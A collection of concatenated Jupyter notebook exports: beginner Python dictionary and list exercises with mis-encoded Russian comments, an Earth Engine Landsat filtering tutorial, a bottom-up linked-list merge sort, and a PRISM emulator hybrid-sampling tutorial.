if rate['Value']/rate['Nominal']<min: #ะัะปะธ ะทะฝะฐัะตะฝะธะต ะบะปััะฐ Value, ะดะตะปะตะฝะฝะพะต ะฝะฐ ะทะฝะฐัะตะฝะธะต ะบะปััะฐ Nominal ะผะตะฝััะต ะผะธะฝะธะผัะผะฐ\n",
min=rate['Value']/rate['Nominal'] #ะะฐะดะฐะตะผ ะฝะพะฒัะน ะผะธะฝะธะผัะผ\n",
valuta=exchange # ะัะธัะฒะฐะธะฒะฐะตะผ ะฟะตัะตะผะตะฝะฝะพะน valuta ะฝะฐะทะฒะฐะฝะธะต ะฒะฐะปััั, ะฒ ะบะพัะพัะพะน ะฝะฐั
ะพะดะธััั ะผะธะฝะธะผัะผ \n",
print(valuta)
bodycount = {
'ะัะพะบะปััะธะต ะงะตัะฝะพะน ะถะตะผััะถะธะฝั': {
'ัะตะปะพะฒะตะบ': 17
},
'ะกัะฝะดัะบ ะผะตััะฒะตัะฐ': {
'ัะตะปะพะฒะตะบ': 56,
'ัะฐะบะพะฒ-ะพััะตะปัะฝะธะบะพะฒ': 1
},
'ะะฐ ะบัะฐั ัะฒะตัะฐ': {
'ัะตะปะพะฒะตะบ': 88
},
'ะะฐ ัััะฐะฝะฝัั
ะฑะตัะตะณะฐั
': {
'ัะตะปะพะฒะตะบ': 56,
'ัััะฐะปะพะบ': 2,
'ัะดะพะฒะธััั
ะถะฐะฑ': 3,
'ะฟะธัะฐัะพะฒ ะทะพะผะฑะธ': 2
}
}
result = []
for film, body in bodycount.items():
for key in body.values():
result.append(key)
sum(result)
```
|
github_jupyter
|
powers = [x**y for x in range(1, 10) for y in [2,10]]
print(powers)
numbers = [x*y for x in range(1, 10) for y in [3, 5, 7]]
print(numbers)
draw_dict = {
'ะ ะพััะธั': 'A',
'ะะพัััะณะฐะปะธั': 'B',
'ะคัะฐะฝัะธั': 'C',
'ะะฐะฝะธั': 'C',
'ะะณะธะฟะตั': 'A'
}
for country, group in draw_dict.items():
print(country, group)
draw_dict = {
'ะ ะพััะธั': 'A',
'ะะพัััะณะฐะปะธั': 'B',
'ะคัะฐะฝัะธั': 'C',
'ะะฐะฝะธั': 'C',
'ะะณะธะฟะตั': 'A'
}
draw_new = {}
for country, group in draw_dict.items():
if group == 'A':
draw_new.setdefault (country, group)
print(draw_new)
2504+4994+6343
csv_file = [
['100412', 'ะะพัะธะฝะบะธ ะดะปั ะณะพัะฝัั
ะปัะถ ATOMIC Hawx Prime 100', 9],
['100728', 'ะกะบะตะนัะฑะพัะด Jdbug RT03', 32],
['100732', 'ะ ะพะปะปะตััะตัั Razor RipStik Bright', 11],
['100803', 'ะะพัะธะฝะบะธ ะดะปั ัะฝะพัะฑะพัะดะฐ DC Tucknee', 20],
['100898', 'ะจะฐะณะพะผะตั Omron HJA-306', 2],
['100934', 'ะัะปััะพะผะตัั Beurer PM62', 17],
]
print(csv_file[4])
csv_file = [
['100412', 'ะะพัะธะฝะบะธ ะดะปั ะณะพัะฝัั
ะปัะถ ATOMIC Hawx Prime 100', 9],
['100728', 'ะกะบะตะนัะฑะพัะด Jdbug RT03', 32],
['100732', 'ะ ะพะปะปะตััะตัั Razor RipStik Bright', 11],
['100803', 'ะะพัะธะฝะบะธ ะดะปั ัะฝะพัะฑะพัะดะฐ DC Tucknee', 20],
['100898', 'ะจะฐะณะพะผะตั Omron HJA-306', 2],
['100934', 'ะัะปััะพะผะตัั Beurer PM62', 17],
]
pulsometer_id = csv_file[4][2]
for record in csv_file:
if record[1] == 'ะจะฐะณะพะผะตั Omron HJA-306':
print('ะะพะปะธัะตััะฒะพ ัะฐะณะพะผะตัะพะฒ ะฝะฐ ัะบะปะฐะดะต - {}ัั'.format(record[2]))
csv_file = [
['100412', 'ะะพัะธะฝะบะธ ะดะปั ะณะพัะฝัั
ะปัะถ ATOMIC Hawx Prime 100', 9],
['100728', 'ะกะบะตะนัะฑะพัะด Jdbug RT03', 32],
['100732', 'ะ ะพะปะปะตััะตัั Razor RipStik Bright', 11],
['100803', 'ะะพัะธะฝะบะธ ะดะปั ัะฝะพัะฑะพัะดะฐ DC Tucknee', 20],
['100898', 'ะจะฐะณะพะผะตั Omron HJA-306', 2],
['100934', 'ะัะปััะพะผะตัั Beurer PM62', 17],
]
csv_file_filtered = []
for item in csv_file:
if item[2] >10:
csv_file_filtered.append(item)
print(csv_file_filtered)
contacts = {
'ะะพัะธัะบะธะฝ ะะปะฐะดะธะผะธั': {
'tel': '5387',
'position': 'ะผะตะฝะตะดะถะตั'
},
'ะกะพะผะพะฒะฐ ะะฐัะฐะปัั': {
'tel': '5443',
'position': 'ัะฐะทัะฐะฑะพััะธะบ'
},
}
print(contacts['ะะพัะธัะบะธะฝ ะะปะฐะดะธะผะธั'])
print(contacts['ะะพัะธัะบะธะฝ ะะปะฐะดะธะผะธั']['tel'])
print(contacts['ะะพัะธัะบะธะฝ ะะปะฐะดะธะผะธั']['position'])
print(contacts.keys())
csv_dict = [
{'id': '100412', 'position': 'ะะพัะธะฝะบะธ ะดะปั ะณะพัะฝัั
ะปัะถ ATOMIC Hawx Prime 100', 'count': 9},
{'id': '100728', 'position': 'ะกะบะตะนัะฑะพัะด Jdbug RT03', 'count': 32},
{'id': '100732', 'position': 'ะ ะพะปะปะตััะตัั Razor RipStik Bright', 'count': 11},
{'id': '100803', 'position': 'ะะพัะธะฝะบะธ ะดะปั ัะฝะพัะฑะพัะดะฐ DC Tucknee', 'count': 20},
{'id': '100898', 'position': 'ะจะฐะณะพะผะตั Omron HJA-306', 'count': 2},
{'id': '100934', 'position': 'ะัะปััะพะผะตัั Beurer PM62', 'count': 17},
]
csv_dict_boots = []
for item in csv_dict:
if 'ะะพัะธะฝะบะธ' in item ['position']:
csv_dict_boots.append(item)
print(csv_dict_boots)
results = [
{'cost': 98, 'source': 'vk'},
{'cost': 153, 'source': 'yandex'},
{'cost': 110, 'source': 'facebook'},
]
min = 1000
for result in results:
if result ['cost'] < min:
min = result['cost']
print(min)
defect_stats = [
{'step number': 1, 'damage': 0.98},
{'step number': 2, 'damage': 0.99},
{'step number': 3, 'damage': 0.99},
{'step number': 4, 'damage': 0.96},
{'step number': 5, 'damage': 0.97},
{'step number': 6, 'damage': 0.97},
]
size=100 # ะธัั
ะพะดะฝัะน ัะฐะทะผะตั 100% ั ะพัะบะปะพะฝะตะฝะธะตะผ 0%\n",
number=0 # ััะฐะฟ ะฟัะพะธะทะฒะพะดััะฒะตะฝะฝะพะน ะปะธะฝะธะธ\n",
for step in defect_stats: #ะัะพั
ะพะดะธะผัั ะฟะพ ะบะฐะถะดะพะผั ะธะท ัะปะพะฒะฐัะตะน ัะฟะธัะบะฐ\n",
size*=step['damage'] # ะฃะผะตะฝััะฐะตะผ ะธัั
ะพะดะฝัะน ัะฐะทะผะตั ะฝะฐ ะฒะตะปะธัะธะฝั ะดะตัะพัะผะฐัะธะธ (ัะผะฝะพะถะฐะตะผ ะฝะฐ ะทะฝะฐัะตะฝะธะต ะบะปััะฐ damage)\n",
if size<90: # ะัะปะธ ะฟะพะปััะธะฒัะธะตัั ะฟะพะฒัะตะถะดะตะฝะธั ะฟัะธะฒะตะปะธ ะบ ัะฐะทะผะตัั ะผะตะฝะตะต 90%\n",
number=step['step number'] # ะะฟัะตะดะตะปัะตะผ ััะฐะฟ, ะฝะฐ ะบะพัะพัะพะผ ััะพ ะฟัะพะธะทะพัะปะพ
break
print(number)
currency = {
'AMD': {
'Name': 'ะัะผัะฝัะบะธั
ะดัะฐะผะพะฒ',
'Nominal': 100,
'Value': 13.121
},
'AUD': {
'Name': 'ะะฒัััะฐะปะธะนัะบะธะน ะดะพะปะปะฐั',
'Nominal': 1,
'Value': 45.5309
},
'INR': {
'Name': 'ะะฝะดะธะนัะบะธั
ััะฟะธะน',
'Nominal': 100,
'Value': 92.9658
},
'MDL': {
'Name': 'ะะพะปะดะฐะฒัะบะธั
ะปะตะตะฒ',
'Nominal': 10,
'Value': 36.9305
},
}
min = 10000
valuta = ''
for n, v in currency.items():
if v['value']/v['Nominal'] < min:
min = v['value']/v['Nominal']
valuta = n
print(valuta)
currency = {
'AMD': {
'Name': 'ะัะผัะฝัะบะธั
ะดัะฐะผะพะฒ',
'Nominal': 100,
'Value': 13.121
},
'AUD': {
'Name': 'ะะฒัััะฐะปะธะนัะบะธะน ะดะพะปะปะฐั',
'Nominal': 1,
'Value': 45.5309
},
'INR': {
'Name': 'ะะฝะดะธะนัะบะธั
ััะฟะธะน',
'Nominal': 100,
'Value': 92.9658
},
'MDL': {
'Name': 'ะะพะปะดะฐะฒัะบะธั
ะปะตะตะฒ',
'Nominal': 10,
'Value': 36.9305
}
}
min = 100000
valuta = ""
for exchange, rate in currency.items(): # ะัะพั
ะพะดะธะผัั ะฟะพ ะบะฐะถะดะพะผั ัะปะตะผะตะฝัั ะฒะปะพะถะตะฝะฝะพะณะพ ัะปะพะฒะฐัั currency\n",
if rate['Value']/rate['Nominal']<min: #ะัะปะธ ะทะฝะฐัะตะฝะธะต ะบะปััะฐ Value, ะดะตะปะตะฝะฝะพะต ะฝะฐ ะทะฝะฐัะตะฝะธะต ะบะปััะฐ Nominal ะผะตะฝััะต ะผะธะฝะธะผัะผะฐ\n",
min=rate['Value']/rate['Nominal'] #ะะฐะดะฐะตะผ ะฝะพะฒัะน ะผะธะฝะธะผัะผ\n",
valuta=exchange # ะัะธัะฒะฐะธะฒะฐะตะผ ะฟะตัะตะผะตะฝะฝะพะน valuta ะฝะฐะทะฒะฐะฝะธะต ะฒะฐะปััั, ะฒ ะบะพัะพัะพะน ะฝะฐั
ะพะดะธััั ะผะธะฝะธะผัะผ \n",
print(valuta)
bodycount = {
'ะัะพะบะปััะธะต ะงะตัะฝะพะน ะถะตะผััะถะธะฝั': {
'ัะตะปะพะฒะตะบ': 17
},
'ะกัะฝะดัะบ ะผะตััะฒะตัะฐ': {
'ัะตะปะพะฒะตะบ': 56,
'ัะฐะบะพะฒ-ะพััะตะปัะฝะธะบะพะฒ': 1
},
'ะะฐ ะบัะฐั ัะฒะตัะฐ': {
'ัะตะปะพะฒะตะบ': 88
},
'ะะฐ ัััะฐะฝะฝัั
ะฑะตัะตะณะฐั
': {
'ัะตะปะพะฒะตะบ': 56,
'ัััะฐะปะพะบ': 2,
'ัะดะพะฒะธััั
ะถะฐะฑ': 3,
'ะฟะธัะฐัะพะฒ ะทะพะผะฑะธ': 2
}
}
result = []
for film, body in bodycount.items():
for key in body.values():
result.append(key)
sum(result)
| 0.141193 | 0.536131 |
<table class="ee-notebook-buttons" align="left">
<td><a target="_blank" href="https://github.com/giswqs/earthengine-py-documentation/tree/master/ImageCollection/03_filtering_image_collection.ipynb"><img width=32px src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" /> View source on GitHub</a></td>
<td><a target="_blank" href="https://nbviewer.jupyter.org/github/giswqs/earthengine-py-documentation/blob/master/ImageCollection/03_filtering_image_collection.ipynb"><img width=26px src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/38/Jupyter_logo.svg/883px-Jupyter_logo.svg.png" />Notebook Viewer</a></td>
<td><a target="_blank" href="https://mybinder.org/v2/gh/giswqs/earthengine-py-documentation/master?filepath=ImageCollection/03_filtering_image_collection.ipynb"><img width=58px src="https://mybinder.org/static/images/logo_social.png" />Run in binder</a></td>
<td><a target="_blank" href="https://colab.research.google.com/github/giswqs/earthengine-py-documentation/blob/master/ImageCollection/03_filtering_image_collection.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" /> Run in Google Colab</a></td>
</table>
# Filtering an ImageCollection
As illustrated in the [Get Started section](https://developers.google.com/earth-engine/getstarted) and the [ImageCollection Information section](https://developers.google.com/earth-engine/ic_info), Earth Engine provides a variety of convenience methods for filtering image collections. Specifically, many common use cases are handled by `imageCollection.filterDate()`, and `imageCollection.filterBounds()`. For general purpose filtering, use `imageCollection.filter()` with an ee.Filter as an argument. The following example demonstrates both convenience methods and `filter()` to identify and remove images with bad registration from an `ImageCollection`:
## Install Earth Engine API
Install the [Earth Engine Python API](https://developers.google.com/earth-engine/python_install) and [geehydro](https://github.com/giswqs/geehydro). The **geehydro** Python package builds on the [folium](https://github.com/python-visualization/folium) package and implements several methods for displaying Earth Engine data layers, such as `Map.addLayer()`, `Map.setCenter()`, `Map.centerObject()`, and `Map.setOptions()`.
The following script checks if the geehydro package has been installed. If not, it will install geehydro, which automatically install its dependencies, including earthengine-api and folium.
```
import subprocess
try:
import geehydro
except ImportError:
print('geehydro package not installed. Installing ...')
subprocess.check_call(["python", '-m', 'pip', 'install', 'geehydro'])
# Import libraries
import ee
import folium
import geehydro
# Authenticate and initialize Earth Engine API
try:
ee.Initialize()
except Exception as e:
ee.Authenticate()
ee.Initialize()
```
## Create an interactive map
This step creates an interactive map using [folium](https://github.com/python-visualization/folium). The default basemap is the OpenStreetMap. Additional basemaps can be added using the `Map.setOptions()` function.
The optional basemaps can be `ROADMAP`, `SATELLITE`, `HYBRID`, `TERRAIN`, or `ESRI`.
```
Map = folium.Map(location=[40, -100], zoom_start=4)
Map.setOptions('HYBRID')
```
## Add Earth Engine Python script
### Simple cloud score
For scoring Landsat pixels by their relative cloudiness, Earth Engine provides a rudimentary cloud scoring algorithm in the `ee.Algorithms.Landsat.simpleCloudScore()` method. Also note that `simpleCloudScore()` adds a band called `cloud` to the input image. The cloud band contains the cloud score from 0 (not cloudy) to 100 (most cloudy).
```
# Load Landsat 5 data, filter by date and bounds.
collection = ee.ImageCollection('LANDSAT/LT05/C01/T2') \
.filterDate('1987-01-01', '1990-05-01') \
.filterBounds(ee.Geometry.Point(25.8544, -18.08874))
# Also filter the collection by the IMAGE_QUALITY property.
filtered = collection \
.filterMetadata('IMAGE_QUALITY', 'equals', 9)
# Create two composites to check the effect of filtering by IMAGE_QUALITY.
badComposite = ee.Algorithms.Landsat.simpleComposite(collection, 75, 3)
goodComposite = ee.Algorithms.Landsat.simpleComposite(filtered, 75, 3)
# Display the composites.
Map.setCenter(25.8544, -18.08874, 13)
Map.addLayer(badComposite,
{'bands': ['B3', 'B2', 'B1'], 'gain': 3.5},
'bad composite')
Map.addLayer(goodComposite,
{'bands': ['B3', 'B2', 'B1'], 'gain': 3.5},
'good composite')
```
## Display Earth Engine data layers
```
Map.setControlVisibility(layerControl=True, fullscreenControl=True, latLngPopup=True)
Map
```
|
github_jupyter
|
import subprocess
try:
import geehydro
except ImportError:
print('geehydro package not installed. Installing ...')
subprocess.check_call(["python", '-m', 'pip', 'install', 'geehydro'])
# Import libraries
import ee
import folium
import geehydro
# Authenticate and initialize Earth Engine API
try:
ee.Initialize()
except Exception as e:
ee.Authenticate()
ee.Initialize()
Map = folium.Map(location=[40, -100], zoom_start=4)
Map.setOptions('HYBRID')
# Load Landsat 5 data, filter by date and bounds.
collection = ee.ImageCollection('LANDSAT/LT05/C01/T2') \
.filterDate('1987-01-01', '1990-05-01') \
.filterBounds(ee.Geometry.Point(25.8544, -18.08874))
# Also filter the collection by the IMAGE_QUALITY property.
filtered = collection \
.filterMetadata('IMAGE_QUALITY', 'equals', 9)
# Create two composites to check the effect of filtering by IMAGE_QUALITY.
badComposite = ee.Algorithms.Landsat.simpleComposite(collection, 75, 3)
goodComposite = ee.Algorithms.Landsat.simpleComposite(filtered, 75, 3)
# Display the composites.
Map.setCenter(25.8544, -18.08874, 13)
Map.addLayer(badComposite,
{'bands': ['B3', 'B2', 'B1'], 'gain': 3.5},
'bad composite')
Map.addLayer(goodComposite,
{'bands': ['B3', 'B2', 'B1'], 'gain': 3.5},
'good composite')
Map.setControlVisibility(layerControl=True, fullscreenControl=True, latLngPopup=True)
Map
| 0.69368 | 0.960398 |
## Problem
Given a linked list, sort it in **O(n log N)** time and **constant** space.
For example: the linked list 4 -> 1 -> -3 -> 99 should become
-3 -> 1 -> 4 -> 99
## Solution
We can sort a linked list in O(n log n) by doing something like merge sort:
- Split the list by half using fast and slow pointers
- Recursively sort each half list (base case: when size of list is 1)
- Merge the sorted halves together by using the standard merge algorithm
However, since we are dividing the list in half and recursively sorting it, the function call stack will grow and use up to log n space. We want to do it in constant O(1) space.
Since the problem comes from the call stack (built by recursion), we can transform the algorithm into an iterative one and keep track of the array indices ourselves to use only constant space.
We can do this by merging blocks at a time from the bottom-up.
Let k be equal to 1. Then we'll merge lists of size k into list of size 2k.
Then double k and repeat, until there are no more merges left.
Consider this example:
```
linked list:
8 -> 6 -> 3 -> 21 -> 23 -> 5
```
After the first pass, we'll combine all pairs so that they are sorted:
```
(6 -> 8) -> and -> (3 -> 21) -> and -> (5 -> 23)
```
And then all groups of 4 (since we doubled k, so k=2 * 2):
```
(3 -> 6 -> 8 -> 21 ) ->and-> (5 -> 23)
```
And then finally the entire list
```
3 -> 5 -> 6 -> 8 -> 21 -> 23 (now sorted!)
```
```
class Node:
def __init__(self, value, nxt=None):
self.value = value
self.next = nxt
def sort(head):
if not head:
# empty linked list. return
return head
k = 1
while True:
first = head
head = None
tail = None
merges = 0
while first:
merges += 1
# Move second 'k' steps forward.
second = first
first_size = 0
for i in range(k):
first_size += 1
second = second.next
if second is None:
# list contains only one node. break.
break
# Merge lists "first" and "second"
second_size = k
while first_size > 0 or (second_size > 0 and second is not None):
temp = None
if first_size == 0:
temp = second
second = second.next
second_size -= 1
elif second_size == 0 or second is None:
temp = first
first = first.next
first_size -= 1
elif first.value <= second.value:
temp = first
first = first.next
first_size -= 1
else:
temp = second
second = second.next
second_size -= 1
if tail is not None:
tail.next = temp
else:
head = temp
tail = temp
first = second
tail.next = None
if merges <= 1:
return head
k = k * 2
# test with linked list: 8 -> 6 -> 3 -> 21 -> 12 -> 20 -> 5
linked_list = Node(8, nxt=Node(6, nxt=Node(3, nxt=Node(21, nxt=Node(12, nxt=Node(20, nxt=Node(5)))))))
sorted_list = sort(linked_list)
# traverse the linked list
def traverse(head):
current = head
li = []
while current:
li.append(current.value)
current = current.next
return li
traverse(sorted_list)
```
|
github_jupyter
|
linked list:
8 -> 6 -> 3 -> 21 -> 23 -> 5
(6 -> 8) -> and -> (3 -> 21) -> and -> (5 -> 23)
(3 -> 6 -> 8 -> 21 ) ->and-> (5 -> 23)
3 -> 5 -> 6 -> 8 -> 21 -> 23 (now sorted!)
class Node:
def __init__(self, value, nxt=None):
self.value = value
self.next = nxt
def sort(head):
if not head:
# empty linked list. return
return head
k = 1
while True:
first = head
head = None
tail = None
merges = 0
while first:
merges += 1
# Move second 'k' steps forward.
second = first
first_size = 0
for i in range(k):
first_size += 1
second = second.next
if second is None:
# list contains only one node. break.
break
# Merge lists "first" and "second"
second_size = k
while first_size > 0 or (second_size > 0 and second is not None):
temp = None
if first_size == 0:
temp = second
second = second.next
second_size -= 1
elif second_size == 0 or second is None:
temp = first
first = first.next
first_size -= 1
elif first.value <= second.value:
temp = first
first = first.next
first_size -= 1
else:
temp = second
second = second.next
second_size -= 1
if tail is not None:
tail.next = temp
else:
head = temp
tail = temp
first = second
tail.next = None
if merges <= 1:
return head
k = k * 2
# test with linked list: 8 -> 6 -> 3 -> 21 -> 12 -> 20 -> 5
linked_list = Node(8, nxt=Node(6, nxt=Node(3, nxt=Node(21, nxt=Node(12, nxt=Node(20, nxt=Node(5)))))))
sorted_list = sort(linked_list)
# traverse the linked list
def traverse(head):
current = head
li = []
while current:
li.append(current.value)
current = current.next
return li
traverse(sorted_list)
| 0.48438 | 0.950503 |
# Tutorial 4: Hybrid sampling
In this tutorial, we will be introduced to the concept of *hybrid sampling*; the process of using an emulator as an additional prior in a Bayesian analysis.
Hybrid sampling can be used to massively speed up parameter estimation algorithms based on MCMC and Bayesian, by utilizing all the information captured by the emulator.
It is assumed here that the reader has successfully completed the first tutorial ([Basic usage](1_basic_usage.ipynb)) and has a basic knowledge of how to perform a Bayesian parameter estimation in Python.
This tutorial mostly covers what can be found in the section on [Hybrid sampling](https://prism-tool.readthedocs.io/en/latest/user/using_prism.html#hybrid-sampling) in the online documentation, but in a more interactive way.
A common problem when using MCMC methods is that it can often take a very long time for MCMC to find its way on the posterior probability distribution function (PDF), which is often referred to as the *burn-in phase*.
This is because, when considering a parameter set for an MCMC walker (where every walker creates its own Markov chain), there is usually no prior information that this parameter set is (un)likely to result into a desirable model realization.
This means that such a parameter set must first be evaluated in the model before any probabilities can be calculated.
However, by constructing an emulator of the model, we can use it as an additional prior for the posterior probability calculation.
Therefore, although *PRISM* is primarily designed to make analyzing models much more efficient and accessible than normal MCMC methods, it is also very capable of enhancing them.
This process is called *hybrid sampling*, which we can perform easily with the `prism.utils` module and which we will explain/explore below.
## Algorithm
Hybrid sampling allows us to use *PRISM* to first analyze a modelโs behavior, and later use the gathered information to speed up parameter estimations (by using the emulator as an additional prior in a Bayesian analysis).
Hybrid sampling works in the following way:
1. Whenever an MCMC walker proposes a new sample, it is first passed to the emulator of the model;
2. If the sample is not within the defined parameter space, it automatically receives a prior probability of zero (or $-\infty$ in case of logarithmic probabilities).
Else, it will be evaluated in the emulator;
3. If the sample is labeled as implausible by the emulator, it also receives a prior probability of zero.
If it is plausible, the sample is evaluated in the same way as for normal sampling;
4. Optionally, a scaled value of the first implausibility cut-off is used as an exploratory method by adding an additional (non-zero) prior probability.
This can be enabled by using the *impl_prior* input argument in the `get_hybrid_lnpost_fn()`-function factory (which we will cover in a bit).
Since the emulator that *PRISM* makes of a model is not defined outside of the parameter space given by `modellink_obj.par_rng`, the second step is necessary to make sure the results are valid.
There are several advantages of using hybrid sampling over normal sampling:
- Acceptable samples are guaranteed to be within plausible space;
- This in turn makes sure that the model is only evaluated for plausible samples, which heavily reduces the number of required evaluations;
- No burn-in phase is required, as the starting positions of the MCMC walkers are chosen to be in plausible space;
- As a consequence, varying the number of walkers tends to have a much lower negative impact on the convergence probability and speed;
- Samples with low implausibility values can optionally be favored.
## Usage
### Preparation
Before we can get started, let's import all the basic packages and definitions that we need to do hybrid sampling:
```
# Imports
from corner import corner
from e13tools.pyplot import f2tex
from e13tools.sampling import lhd
import matplotlib.pyplot as plt
import numpy as np
from prism import Pipeline
from prism.modellink import GaussianLink
from prism.utils import get_hybrid_lnpost_fn, get_walkers
```
We also require a constructed emulator of the desired model.
For this tutorial, we will use the trusty `GaussianLink` class again, but feel free to use a different `ModelLink` subclass or modify the settings below (keep in mind that the second iteration may take a little while to analyze):
```
# Emulator construction
# Set required emulator iteration
emul_i = 2
# Create GaussianLink object
model_data = {3: [3.0, 0.1], # f(3) = 3.0 +- 0.1
5: [5.0, 0.1], # f(5) = 5.0 +- 0.1
7: [3.0, 0.1]} # f(7) = 3.0 +- 0.1
modellink_obj = GaussianLink(model_data=model_data)
# Initialize Pipeline
pipe = Pipeline(modellink_obj, working_dir='prism_hybrid')
# Construct required iterations
for i in range(pipe.emulator.emul_i+1, emul_i+1):
# For reproducibility, set the NumPy random seed for each iteration
np.random.seed(1313*i)
# Use analyze=False to use different impl_cuts for different iterations
pipe.construct(i, analyze=False)
# Use different analysis settings for iteration 2
if(i == 2):
pipe.base_eval_sam = 8000
pipe.impl_cut = [4.0, 3.8, 3.6]
# Analyze iteration
pipe.analyze()
# Set NumPy random seed to something random
np.random.seed()
```
### Implementing hybrid sampling
In order to help us with combining *PRISM* with MCMC to use hybrid sampling, the `prism.utils` module provides two support functions: `get_walkers()` and `get_hybrid_lnpost_fn()`.
As these functions will make our job of using hybrid sampling much easier, let's take a look at both of them.
#### get_walkers()
If we were to do normal MCMC sampling, then it would be required for us to provide our sampling script (whatever that may be) with the starting positions of all MCMC walkers, or at least with the number of MCMC walkers we want.
Normally, we would have no idea what starting positions to choose, as we know nothing about the corresponding model parameter space.
However, as we have already constructed an emulator of the target model, we actually do have some information at our disposal that could help us in choosing their starting positions.
Preferably, we would choose the starting positions of the MCMC walkers in the plausible space of the emulator, as we know that these will be close to the desired parameter set.
This is where the `get_walkers()`-function comes in.
It allows us to obtain a set of plausible starting positions for our MCMC walkers, given a `Pipeline` object.
By default, `get_walkers()` returns the available plausible samples of the last constructed iteration (`pipe.impl_sam`), but we can also supply it with an integer stating how many starting positions we want to propose or we can provide our own set of proposed starting positions.
Below we can see these three different scenarios in action:
```
# Use impl_sam if it is available (default)
n_walkers, p0_walkers = get_walkers(pipe)
print("Number of plausible starting positions (default) : %i" % (n_walkers))
# Propose 10000 starting positions
init_walkers = 10000
n_walkers, p0_walkers = get_walkers(pipe, init_walkers=init_walkers)
print("Number of plausible starting positions (integer) : %i" % (n_walkers))
# Propose custom set of 10000 starting positions
init_walkers = lhd(10000, modellink_obj._n_par, modellink_obj._par_rng)
n_walkers, p0_walkers = get_walkers(pipe, init_walkers=init_walkers)
print("Number of plausible starting positions (custom) : %i" % (n_walkers), flush=True)
# Request at least 1000 plausible starting positions (requires v1.1.4 or later)
n_walkers, p0_walkers = get_walkers(pipe, req_n_walkers=1000)
print("Number of plausible starting positions (specific): %i" % (n_walkers))
```
Note that when there is still a large part of parameter space left, the number of plausible starting positions will probably greatly vary between runs when a specific number is requested.
As hybrid sampling works better when plausible space is very small, it is usually recommended that we first construct a good emulator before attempting to do hybrid sampling.
This is also why we used different implausibility parameters for the analysis of the second emulator iteration.
As *PRISM*'s sampling methods operate in parameter space, `get_walkers()` automatically assumes that all starting positions are defined in parameter space.
However, as some sampling methods use unit space, we can request normalized starting positions by providing `get_walkers()` with *unit_space=True*.
We have to keep in mind though that, because of the way the emulator works, there is no guarantee for a specific number of plausible starting positions to be returned.
Having the desired emulator iteration already analyzed may give us an indication of how many starting positions in total we need to propose to be left with a specific number.
However, starting with v1.1.4, the `get_walkers()`-function takes the *req_n_walkers* argument, which allows us to request a specific minimum number of plausible starting positions (as shown).
When the starting positions of our MCMC walkers have been determined, we can use them in our MCMC sampling script, avoiding the previously mentioned burn-in phase.
Although this in itself can already be very useful, it does not allow us to perform hybrid sampling yet.
In order to do this, we additionally need something else.
#### get_hybrid_lnpost_fn()
Most MCMC methods require the definition of an `lnpost()`-function.
This function takes a proposed sample step in the chain of an MCMC walker and returns the corresponding natural logarithm of the posterior probability.
The returned value is then compared with the current value, and the new step is accepted with some probability based on this comparison.
As we have learned, in order to do hybrid sampling, we require the [algorithm](#Algorithm) described before.
Therefore, we need to modify this `lnpost()`-function to first evaluate the proposed sample in the emulator and only perform the normal posterior probability calculation when this sample is plausible.
Making this modification is the job of the `get_hybrid_lnpost_fn()`-function factory.
It takes a user-defined `lnpost()`-function (as input argument *lnpost_fn*) and a `Pipeline` object, and returns a function definition ``hybrid_lnpost(par_set, *args, **kwargs)``.
This `hybrid_lnpost()`-function first analyzes a proposed *par_set* in the emulator, and passes *par_set* (along with any additional arguments) to `lnpost()` if the sample is plausible, or returns $-\infty$ if it is not.
The return-value of the `lnpost()`-function is then returned by the `hybrid_lnpost()`-function as well.
The reason why we use a function factory here, is that it allows us to validate all input arguments once and then save them as local variables for the `hybrid_lnpost()`-function.
Not only does this avoid that we have to provide and validate all input arguments (like *emul_i* and *pipeline_obj*) for every individual proposal, but it also ensures that we always use the same arguments, as we cannot modify the local variables of a function.
So, let's define an `lnpost()`-function, which uses a simple Gaussian probability function:
```
# Pre-calculate the data variance. Assume data_err is centered
data_var = np.array([err[0]**2 for err in modellink_obj._data_err])
# Add a global counter to measure the number of times the model is called
global call_counter
call_counter = 0
# Define lnpost
def lnpost(par_set):
# Check if par_set is within parameter space and return -infty if not
# Note that this is not needed if we solely use lnpost for hybrid sampling
par_rng = modellink_obj._par_rng
if not ((par_rng[:, 0] <= par_set)*(par_set <= par_rng[:, 1])).all():
return(-np.infty)
# Increment call_counter by one
global call_counter
call_counter += 1
# Convert par_set to par_dict
par_dict = dict(zip(modellink_obj._par_name, par_set))
# Evaluate model at requested parameter set
mod_out = modellink_obj.call_model(emul_i, par_dict,
modellink_obj._data_idx)
# Get model and total variances
md_var = modellink_obj.get_md_var(emul_i, par_dict,
modellink_obj._data_idx)
tot_var = md_var+data_var
# Calculate the posterior probability
return(-0.5*(np.sum((modellink_obj._data_val-mod_out)**2/tot_var)))
```
As we already have a way of evaluating our model using the `ModelLink` subclass, we used this to our advantage and simply made the `call_model()` and `get_md_var()`-methods part of the posterior probability calculation.
We also know that the data variance will not change in between evaluations, so we calculated it once outside of the function definition.
Keep in mind that hybrid sampling itself already checks if a proposed sample is within parameter space, and it was therefore not necessary to check for this in our `lnpost()`-function, unless we are going to do normal sampling as well (in which case it acts as a prior).
Now that we have defined our `lnpost()`-function, we can create a specialized version of it that automatically performs hybrid sampling:
```
hybrid_lnpost = get_hybrid_lnpost_fn(lnpost, pipe)
```
As with the `get_walkers()`-function, the `get_hybrid_lnpost_fn()`-function factory can be set to perform in unit space by providing it with *unit_space=True*.
This will make the returned `hybrid_lnpost()`-function expect normalized samples.
We also have to keep in mind that by calling the `get_hybrid_lnpost_fn()`-function factory, *PRISM* has turned off all normal logging.
This is to avoid having thousands of similar logging messages being made.
It can be turned back on again by executing `pipe.do_logging = True`.
We can check if the returned `hybrid_lnpost()`-function really will perform hybrid sampling, by evaluating an implausible sample in it (in almost all cases, `[1, 1, 1]` will be implausible for the `GaussianLink` class. If not, feel free to change the sample):
```
# Define a sample
par_set = [1, 1, 1]
# Evaluate it in the pipeline to check if it is plausible
pipe.evaluate(par_set)
# Evaluate this sample in both lnpost and hybrid_lnpost
print()
print(" lnpost(%s) = %s" % (par_set, lnpost(par_set)))
print("hybrid_lnpost(%s) = %s" % (par_set, hybrid_lnpost(par_set)))
```
Here, we can see that while the proposed sample does give a finite log-posterior probability when evaluated in the `lnpost()`-function, this is not the case when evaluated in the `hybrid_lnpost()`-function due to the sample not being plausible in the emulator.
And, finally, as it is very likely that we will frequently use `get_walkers()` and `get_hybrid_lnpost_fn()` together, the `get_walkers()`-function allows for the *lnpost_fn* input argument to be provided to it.
